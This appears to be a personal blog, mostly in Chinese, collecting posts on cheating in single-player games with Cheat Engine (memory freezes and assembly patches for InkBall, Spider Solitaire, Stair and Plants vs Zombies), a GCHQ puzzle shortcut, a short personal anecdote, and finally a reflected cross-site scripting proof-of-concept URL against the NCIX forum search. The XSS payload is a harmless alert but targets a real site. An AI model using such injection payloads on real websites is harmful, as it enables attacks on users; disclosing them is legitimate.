MoonBay

最近在玩修改Plants VS Zombies這款小遊戲，就順便修改一下我偶而會玩的其他小遊戲
我玩的遊戲很少啦… (= _ =)

看圖就說明一切了!!!

1.打棒球

2.Minesweeper

2.InkBall
change timer value and could “frozen” the timer value.
By doing the following change, the timer value will increase one every second.
could change score and best score!! 觀察一下就好

00EC2D62 – EB 3B – jmp 00EC2D9F
00EC2D64 – 2B C7 – sub eax,edi <--- add eax,edi
00EC2D66 - 89 43 28 - mov [rbx+28],eax <<
00EC2D69 - 3D F82A0000 - cmp eax,00002AF8
00EC2D6E - 73 2F - jae 00EC2D9F

00EC1970 - E8 2F6F0000 - call 00EC88A4
00EC1975 - 90 - nop
00EC1976 - 01 5F 2C - add [rdi+2C],ebx <--add score from timer value(replace)
00EC1979 - 8B 47 2C - mov eax,[rdi+2C]
00EC197C - 3B 47 28 - cmp eax,[rdi+28]

replace with :
add ebx, 100
add [rdi+2C],ebx

3.Spider Solitaire
could “frozen”/change game score and game-move value.

FFD93563 – 75 0B – jne FFD93570
FFD93565 – 48 8B 81 E8000000 – mov rax,[rcx+000000E8]
FFD9356C – 83 40 10 01 – add dword ptr [rax+10],01 <<-- add dword ptr [rax+10],00
FFD93570 - 83 B9 F8000000 00 - cmp dword ptr [rcx+000000F8],00
FFD93577 - 76 28 - jna FFD935A1

will stop adding move-value

3.Stair

Top
0040698B – C1 E0 05 – shl eax,05
0040698E – 8B 4D 08 – mov ecx,[ebp+08]
00406991 – 83 AC 08 70110000 06 – sub dword ptr [eax+ecx+00001170],06 << health -6(replace)
00406999 - E9 7D000000 - jmp 00406A1B
0040699E - 8B 45 F8 - mov eax,[ebp-08]

replace:
sub dword ptr [eax+ecx+00001170],00 <-- won't lose the health points

Button
0040630B - C1 E0 05 - shl eax,05
0040630E - 8B 4D 08 - mov ecx,[ebp+08]
00406311 - 83 AC 08 70110000 05 - sub dword ptr [eax+ecx+00001170],05 << health -5(replace)
00406319 - 8B 45 F4 - mov eax,[ebp-0C]
0040631C - C1 E0 05 - shl eax,05

replace:
sub dword ptr [eax+ecx+00001170],00 <-- won't lose the health points

stair
00404DAE - C7 80 F8120000 00000000 - mov [eax+000012F8],00000000
00404DB8 - 8B 45 08 - mov eax,[ebp+08]
00404DBB - FF 80 FC120000 - inc [eax+000012FC] <<--stair +1 (replace)
00404DC1 - 5F - pop edi
00404DC2 - 5E - pop esi

newmem:
add [eax+000012FC],0000000A

前幾個禮拜朋友介紹的一款小遊戲，覺得很好玩耶!!!大家可以買來玩玩看
瘋狂地玩個三四天後就破關了XDXD

先開啟PvZ再用Cheat Engine來修改

1. 修改太陽能

觀察太陽能的變化可以很簡單地追蹤出太陽能數值所在的記憶體
直接把太陽能修改成9999，修改過後的數值可以直接”凍結”起來，這樣可以讓數值永遠都維持在9999
不過測試的結果是如果換到下一場game的時候太陽能又得再追蹤一次了

2. 修改Wisdom Tree高度

觀察Wisdom tree高度，可以追蹤出高度數值所在記憶體，直接把高度改成9999

修改後的數值9999!!!

3. 修改無限金幣

透過觀察金幣的數值變化然後修改其數值，或是直接修改 ” 0AB4F348 “的數值

這是原先的金幣數值

找尋金幣數值，目前我的金幣是26760，但只要尋找數值2676就好了

買東西後變動數值

搜尋變動數值26560 –> 2656
並把數值改為9999這樣將會有金幣99990可以使用，並且”凍結”後將會保持金幣數值為修改過後的值(99990)

修改過後的金幣99990!!!!!!!!!!!!!!而且”凍結”後買任何東西金幣都不會變!!!

4. 修改Super Plant!!!

Super Plant顧名思義就像是拿到星星的馬力歐…無敵狀態，雖然不若星星馬力歐可以直接撞飛敵人
但也是不會被咬掉就是了 = =…整個是無敵狀態……可以拿來衝survival endless flag!!
修改位址” 00540680 “的code為”NOP” (Replace with code that does nothing)
因為版本不同其他可能的位址為” 0052FCF0 “,” 00530440 ”
或者直接尋找assembly code: ” add dword ptr [esi+40],fc “

尋找位址” 00540680 ”

使用”Replace with code that does nothing”

5. 修改植物recharge的時間

每一種植物栽種後都有一定的等待時間，在這段期間不能栽種同一種植物
但可以透過修改的方式把所有的recharge時間”消除”

請在Cheat Engine裡面轉到位址:

00491E4C

依照版本的不同可能有所不同

轉到位址00491E4C後修改本來的code然後按下OK就可以把recharge time”消除”

inc [edi+24] 為 —> add [edi+24],01

6. 金幣噴泉
狂噴錢錢!!! Money fountain!!!! good if it’s real money!!!

7. 玉米砲!!!

Plants VS Zombies — cob cannon instant reload hack success!!
消除玉米砲彈填充時間成功了!!!!還滿簡單就可以追出來的XDXD
chomper 和potato mine 也可以消除時間!!
呼~~~

這樣就可以享受對殭屍的狂轟濫炸了!!!!!
enjoy!!

GCHQ的Can You Crack It?網站可以用簡單的google search就”破解”了

http://www.canyoucrackit.co.uk/soyoudidit.asp

Simple Google search unlocks GCHQ code-cracking competition
How to crack the GCHQ Code Breaking Competition using Google
How to solve the GCHQ challenge

昨天看到客戶的女兒，總覺得好像宣映
除了長得像外，連神韻也像 那種有點傲有點狡邪的眼神 = =
不禁多看了幾眼，卻越看越像!!!

這是跟我開玩笑嗎???? 只能笑笑地離開… 離開這個玩笑…

fond it on this August. I already contact NCIX but no reply…

PoC:
works on XP SP2 IE7

http://forums.ncix.com/forums/?q”+onmouseover=”javascript:alert(String.fromCharCode(71,111,116,32,88,83,83,101,100,33,33))”&mode=forumsearch